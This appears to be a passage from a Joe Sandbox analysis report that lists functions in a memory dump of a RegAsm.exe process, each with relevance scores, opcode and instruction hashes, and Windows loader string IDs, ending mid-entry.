                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: bbe007e95f79bfcf7fd126ba885bd688e4b520287f82f61ad945ea8d9a0f2184
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: D0C1AE313053419BEB24CE28C841B6BFBE5BFC4358F188A2DF9958A2D1D775D505CB92
                                                    Function 02FBE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: edce4f6c30d1e3f09eff92c88f123019f53fcc73e8869a130afc2dadda0a6436
                                                    • Instruction ID: 09c20c91cc4882dc50cb47746737a1e81b81279ff7176693a56905d9392df068
                                                    • Opcode Fuzzy Hash: edce4f6c30d1e3f09eff92c88f123019f53fcc73e8869a130afc2dadda0a6436
                                                    • Instruction Fuzzy Hash: 6F614972E006189FDB15DFA9C840BEEBBB5FF48784F608169E659EB291D731E900CB50
                                                    Function 02F4A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 02F4A309
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 02F4A2FB
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: 07d676f19cf2642bc302c4bbccf86414cdd52376e0038ddc9bc71bc5acdac14d
                                                    • Instruction ID: 90fb0344ecd6f787f6d17845ec97710190c393406561571b07cc3c4d66890d50
                                                    • Opcode Fuzzy Hash: 07d676f19cf2642bc302c4bbccf86414cdd52376e0038ddc9bc71bc5acdac14d
                                                    • Instruction Fuzzy Hash: 0F41BF71B41659CBDB21CF69C860B6A7BB5EF84388F1440A5EE01DB291EB76D900CB40
                                                    Function 02F7329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local\$@
                                                    • API String ID: 0-380025441
                                                    • Opcode ID: 7451e92e25616e99c1380ab2f9f2a3a8de01f602793a33cb1326455739bdf0d4
                                                    • Instruction ID: e1b5b0f03c5e5f479461cf08c7d75f5b04dae942f08885494ea55ab24404b7b4
                                                    • Opcode Fuzzy Hash: 7451e92e25616e99c1380ab2f9f2a3a8de01f602793a33cb1326455739bdf0d4
                                                    • Instruction Fuzzy Hash: 9D3190B2609344AFC361DF28C880A5BBBE8FBC56D4F40096EFA9583250DB35DD04DB92
                                                    Function 02F4C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: 75016384694bafa82505a622974afdb1a1171e1d4ac8593040aacfe84fdb5579
                                                    • Instruction ID: dcfaf1deed54c87d2263d8dbed646a50c052d023539daa7b51dd7368d76eb3f2
                                                    • Opcode Fuzzy Hash: 75016384694bafa82505a622974afdb1a1171e1d4ac8593040aacfe84fdb5579
                                                    • Instruction Fuzzy Hash: E1826E75E012188FDB24CFA9C980BEDBBB1BF48794F14816ADA19AB350DBB09D41CF50
                                                    Function 02F47370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff98b2381d307932da3137ccfaf5ab6112c05a355c00dc297275d27430fff748
                                                    • Instruction ID: 53c2ddefdf27655777eef3b737d84d7451a9841d4d4847d023ecfb7cf50fa4aa
                                                    • Opcode Fuzzy Hash: ff98b2381d307932da3137ccfaf5ab6112c05a355c00dc297275d27430fff748
                                                    • Instruction Fuzzy Hash: 2EA14D71A08341DFC310EF28C580A2AFBE6BF88784F15496DE6859B350EB70E945CF92
                                                    Function 02F7F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8183406bf2f696c619db67fde3d1b255038f54b69f8ea19ee869c76e38c84f6e
                                                    • Instruction ID: 03fdd7c32b7467e3b0d84be8449204a9130cc2f3bdbcdc1ba3eff8df31fd04f0
                                                    • Opcode Fuzzy Hash: 8183406bf2f696c619db67fde3d1b255038f54b69f8ea19ee869c76e38c84f6e
                                                    • Instruction Fuzzy Hash: 71414DB4D11288AFDB20DFA9D880AAEFBF8FB49784F10426ED559A7611D7319940CF60
                                                    Function 02F7A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    • Opcode ID: 457fee2de579d688f3d62dce7b316fc0224712db2595cb503fc7dabc783de9b3
                                                    • Instruction ID: ac750afa8dad762a8940818d5ad4d0b3a66b22685a8055785ed40f16b501a850
                                                    • Opcode Fuzzy Hash: 457fee2de579d688f3d62dce7b316fc0224712db2595cb503fc7dabc783de9b3
                                                    • Instruction Fuzzy Hash: D9716F75E0021A9FDF29DF99C990AEDBBB6BF48784F24812EE605E7640DB319901CF50
                                                    Function 02F4973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                    • Instruction ID: 186cb38767931ae68f5157800c9ddc73c2e8177c552ff5cd9046f344d6b3731b
                                                    • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                    • Instruction Fuzzy Hash: 32615F71E01259ABDF11DFA9C844FAFBBB5FF84794F14416AEA10B7290DBB49900CB50
                                                    Function 02FCF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                    • Instruction ID: 817a09694f379a2cc4c82dad8db18d370ab6d4f283be87612c06e59aa636f6cb
                                                    • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                    • Instruction Fuzzy Hash: 92519B72514346AFDB219F54CD40F6AF7EAFB84794F200A2EBB4097A90D774E904CB92
                                                    Function 02F5E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    • Opcode ID: d201cd18512c097f8d5b824fe0541cf74e91722725ef9fcd0ba71cf14e27b910
                                                    • Instruction ID: 8bdc528cdd0e07578f5511c8670941bf05a752ff32fb3ed17590a9c12de32337
                                                    • Opcode Fuzzy Hash: d201cd18512c097f8d5b824fe0541cf74e91722725ef9fcd0ba71cf14e27b910
                                                    • Instruction Fuzzy Hash: 8C41B472A083259BD710DA74DC40B6BB7D9AF88B88F44092DFF95E7140E774DA04CB96
                                                    Function 02FFB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PreferredUILanguages
                                                    • API String ID: 0-1884656846
                                                    • Opcode ID: 40db2359082fe868945f3978aa301cdfc0a74ae04ab52cb3526413fc8ffcf0bd
                                                    • Instruction ID: 27adedd015371da11d359de43aeee6056ea5d4a641b5d0b1693fa606cbc02f27
                                                    • Opcode Fuzzy Hash: 40db2359082fe868945f3978aa301cdfc0a74ae04ab52cb3526413fc8ffcf0bd
                                                    • Instruction Fuzzy Hash: 5D41A372D40219ABDB11DE94CC40BEEB7BAEF48798F054166EB11BB260D774DE40CBA0
                                                    Function 02FBC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: 55333ab5ab445a9b1d08cb3431197ab430bd9e8a1a52fe6ccb5bcb6aec665785
                                                    • Instruction ID: 9ac630314e0aae75afc1040e29f954f659fedac863d889b822d90edf22b09b77
                                                    • Opcode Fuzzy Hash: 55333ab5ab445a9b1d08cb3431197ab430bd9e8a1a52fe6ccb5bcb6aec665785
                                                    • Instruction Fuzzy Hash: 2F4111B1D0112CAEDF219A61CC84FDEB77DAF45794F0045E6EB08AB140DB709E898FA4
                                                    Function 02FC97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: verifier.dll
                                                    • API String ID: 0-3265496382
                                                    • Opcode ID: 1cea131b9ff35908198f27c90bb0eea3d75429ae61828a2479bd3e7cfcf4b329
                                                    • Instruction ID: 5b5e61dabeeed9e6731fb6038728bcd1be1a94f1efc4825265a453adae111a3e
                                                    • Opcode Fuzzy Hash: 1cea131b9ff35908198f27c90bb0eea3d75429ae61828a2479bd3e7cfcf4b329
                                                    • Instruction Fuzzy Hash: 7C3181B2B042039FDB249E29D950F76B6E5EB49794FE4847DEB059B2D0E7B188808790
                                                    Function 02FE705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: kLsE
                                                    • API String ID: 0-3058123920
                                                    • Opcode ID: 2f96a2c8c10491325525b53a8722bebfd560fe0b8ecae4f7ed4fe73f2518bef6
                                                    • Instruction ID: 45f247777388d9f801b5c2375093d38b47bc89995ad2396ef35b85aa4609272c
                                                    • Opcode Fuzzy Hash: 2f96a2c8c10491325525b53a8722bebfd560fe0b8ecae4f7ed4fe73f2518bef6
                                                    • Instruction Fuzzy Hash: 32417A3190234456EB22FF60ECC4B697B99EB40BE8F140119EF519B1D9CBBD0485CBA1
                                                    Function 02F736EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Flst
                                                    • API String ID: 0-2374792617
                                                    • Opcode ID: 97667ff250c049dbc3bf6db87729d6752e042c84c90a57efffb3eb62a992ee96
                                                    • Instruction ID: 8bfb1fa104ed92d609133afab94fd438e8557ca28d00e3e82a815d9c5e2a4d56
                                                    • Opcode Fuzzy Hash: 97667ff250c049dbc3bf6db87729d6752e042c84c90a57efffb3eb62a992ee96
                                                    • Instruction Fuzzy Hash: 7C41CCB1609305EFC715CF29C480A56FBE4EF49794F1481AEEA49CF241EB31D942CB91
                                                    Function 02F39730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L4QwL4Qw
                                                    • API String ID: 0-1417497668
                                                    • Opcode ID: cc7c7d063d98c7b12572cbaf83ef2f63b997c0e5bd59c66d27857b76ace687cb
                                                    • Instruction ID: 24dd73dd639d1355a2f15bd6a3819297c4494dbc486c589c9cfd8b9df11de5aa
                                                    • Opcode Fuzzy Hash: cc7c7d063d98c7b12572cbaf83ef2f63b997c0e5bd59c66d27857b76ace687cb
                                                    • Instruction Fuzzy Hash: B321C276A00618AFD722DF58C840B1ABBB5FB84B94F110969AB559B781D7F4EC01CB90
                                                    Function 02F45096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: 45f85db098f63c0bed6d7c217cfa6c65e9ee91aa1abd20dcc3dfe2c678240970
                                                    • Instruction ID: 00cab0ad60f3d3f4c61d069f58b605db6910ddf2122e16bd005442342500d2a4
                                                    • Opcode Fuzzy Hash: 45f85db098f63c0bed6d7c217cfa6c65e9ee91aa1abd20dcc3dfe2c678240970
                                                    • Instruction Fuzzy Hash: FB11D636B041138BE724690C88507367A95EBF1BD4FB4412AE751CB350DFF1E840C380
                                                    Function 02FC106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrCreateEnclave
                                                    • API String ID: 0-3262589265
                                                    • Opcode ID: 0eb81b42b833f3c07c828ea74a66530dbf0cdc1ec83ca3ee173902a624780286
                                                    • Instruction ID: 25c8bf79e85be98815f5484a39a95453d059559640e0e959bbdb01bb12f19050
                                                    • Opcode Fuzzy Hash: 0eb81b42b833f3c07c828ea74a66530dbf0cdc1ec83ca3ee173902a624780286
                                                    • Instruction Fuzzy Hash: 322134B19183449FD310DF1AC944A9BFBE8FBD5B80F104A1EBA9497251DBB5D408CF92
                                                    Function 02F9739A Relevance: .7, Instructions: 705COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59b68f1f843eb734631e11dd1d0ef35170c3d9f392dad29267221bdf3b6c3cce
                                                    • Instruction ID: 05e7dba2117d72350bdd769d408460c2f00aa5c62480bcf8d1eb5a6b94b01375
                                                    • Opcode Fuzzy Hash: 59b68f1f843eb734631e11dd1d0ef35170c3d9f392dad29267221bdf3b6c3cce
                                                    • Instruction Fuzzy Hash: 51429EB1E107168FEF18DF59C890AAEF7B2FF89354B148159DA52AB350D734E842CB90
                                                    Function 02F6B2C0 Relevance: .6, Instructions: 629COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2be5e19f3f0a2e97f4a4e8c4dc32e667dc05f787dc4335cd9d3598eb33d042e2
                                                    • Instruction ID: 24c839c3f6bb83863e359661b695e6d64c46254c2d3ad1e16e7f800c32290fc6
                                                    • Opcode Fuzzy Hash: 2be5e19f3f0a2e97f4a4e8c4dc32e667dc05f787dc4335cd9d3598eb33d042e2
                                                    • Instruction Fuzzy Hash: F032B072E00219DBCB14DFA8D994BBEBBB5FF54798F180069EA05BB341E7359901CB90
                                                    Function 02FD8158 Relevance: .6, Instructions: 617COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf99e7ba3767557fd4c7553d4f0e8bed8e20a3fe9920bbd238bbdc8e27112e6e
                                                    • Instruction ID: 75ab097f3e06bd4ad751c81adeb8fb700ec9c671d87bc3af8e4c7bcbe1699dff
                                                    • Opcode Fuzzy Hash: bf99e7ba3767557fd4c7553d4f0e8bed8e20a3fe9920bbd238bbdc8e27112e6e
                                                    • Instruction Fuzzy Hash: 9C425A75E002198FDB24CF69CC81BADB7F6BF48394F188199EA49AB241D734AD85CF50
                                                    Function 02FEA118 Relevance: .6, Instructions: 591COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce0d7f430f13ee0e5d240a8994ca5c284d3cc5cdd7a9c6eea19c1ac43c138aae
                                                    • Instruction ID: 15f9f59ff022b3cc8c438bf5354a1b6f0fc624701b3e717f0d88192905f3e25e
                                                    • Opcode Fuzzy Hash: ce0d7f430f13ee0e5d240a8994ca5c284d3cc5cdd7a9c6eea19c1ac43c138aae
                                                    • Instruction Fuzzy Hash: 2522E175A047518FDF26CF29C090372B7F1AF45388F18849AEA978F296E335E452CB61
                                                    Function 030016CC Relevance: .6, Instructions: 571COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d787f2df34bb6e7d49955005266a691ed229d6ccaa3f7762fa84cd352921dd37
                                                    • Instruction ID: 25a66fcfbd3e1359a34dbc462df252fe297795eb1d2d30c7343970ad497fb74e
                                                    • Opcode Fuzzy Hash: d787f2df34bb6e7d49955005266a691ed229d6ccaa3f7762fa84cd352921dd37
                                                    • Instruction Fuzzy Hash: 1C22A239A012168FEB1DCF58C890AAEF7F6BF89314F18456DD9569B380DB34E941CB90
                                                    Function 02F38397 Relevance: .4, Instructions: 380COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ae85576b06bb24eb6237292545f0c61ae16068ae832ac1bbd1cecb40feff051
                                                    • Instruction ID: ec56db66c16be2744d18e1a83297f78a3f3141c4d7e832a2a15ede518247cf80
                                                    • Opcode Fuzzy Hash: 3ae85576b06bb24eb6237292545f0c61ae16068ae832ac1bbd1cecb40feff051
                                                    • Instruction Fuzzy Hash: CFD1B372A0020A9BDF15DF65CC90BBA77A6BF443D8F044669FB16DB280E738E945CB50
                                                    Function 02F4D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 878bae46d7f72c5937e05327c01a9816dae2fa4081527111f5173fb79dd5189e
                                                    • Instruction ID: a738e04b97429387c41d9c712234d7dcdf6d10d6c12e72b1b10d1a9ece9db79d
                                                    • Opcode Fuzzy Hash: 878bae46d7f72c5937e05327c01a9816dae2fa4081527111f5173fb79dd5189e
                                                    • Instruction Fuzzy Hash: 19C1C771F002169BEB15CF58C850BAEBBB6FF44794F148269DA15BB281DBB0E941CB90
                                                    Function 02F690DB Relevance: .3, Instructions: 287COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7542f7782d23d50a41c2055b2d91542a8a67cf8c361d2bca952d61fd046f3084
                                                    • Instruction ID: cd568081bb3d0896eb008160d31637202f32442693fe08cdbdd59cb0eefc4a1d
                                                    • Opcode Fuzzy Hash: 7542f7782d23d50a41c2055b2d91542a8a67cf8c361d2bca952d61fd046f3084
                                                    • Instruction Fuzzy Hash: 20A11BB1900655AFEB12AF68CC95BBE77B9EF49794F010054FB10AB2A0D775AC50CBA0
                                                    Function 02F483C0 Relevance: .3, Instructions: 281COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06864db125d684adab48d3c17695337d5aa5a04c54b9053dd829c993c952a9dd
                                                    • Instruction ID: 0b67375f5cf8e5b32fb48a1cf4916250dfa37c80cf921b5350b0711836fa71ab
                                                    • Opcode Fuzzy Hash: 06864db125d684adab48d3c17695337d5aa5a04c54b9053dd829c993c952a9dd
                                                    • Instruction Fuzzy Hash: 1EC149756083408FD764CF15C894BABBBE5BF88384F45495DEA8987390DBB4E908CF92
                                                    Function 02F80185 Relevance: .3, Instructions: 276COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac971d7e80820d9d1fb7d8e79810243b82ffc9f9d827bd13b17df5f934e58ac1
                                                    • Instruction ID: a254b43ffaef8e66ac75580c15b1be9b75255b6811230e245c9ae8ef99abbb21
                                                    • Opcode Fuzzy Hash: ac971d7e80820d9d1fb7d8e79810243b82ffc9f9d827bd13b17df5f934e58ac1
                                                    • Instruction Fuzzy Hash: 60A1B071B0161A9BDB24EF66C990BAAF7B6FF44394F40402DEB0597281EB74E815CF90
                                                    Function 02FC60E0 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 380ec9ae13bdcba229829697b784f79925ce6172f870ec776f2a1e009c3404c6
                                                    • Instruction ID: 57632b547e61be6d0b48d4bddf7e221a6bb5fac2f22340a2645d3d75d70078ef
                                                    • Opcode Fuzzy Hash: 380ec9ae13bdcba229829697b784f79925ce6172f870ec776f2a1e009c3404c6
                                                    • Instruction Fuzzy Hash: 37919271E04216AFDF15CFA8D984BAEBBB9AB88794F25415DE710EB341D734D9008BA0
                                                    Function 02F5E3F0 Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c4fbf636e74fa99b9139658f8f3aa4aa4f7960a81075071e8bb9471edc764f7
                                                    • Instruction ID: 3d92ca59b3c720b5657994c0a989196ea2bab43c0dba243c311942db52c3c002
                                                    • Opcode Fuzzy Hash: 3c4fbf636e74fa99b9139658f8f3aa4aa4f7960a81075071e8bb9471edc764f7
                                                    • Instruction Fuzzy Hash: DF911276E006259BDB24DF28C990B7EB7A6EF88794F054066EF05DB380E774DA01CB60
                                                    Function 02F41131 Relevance: .3, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
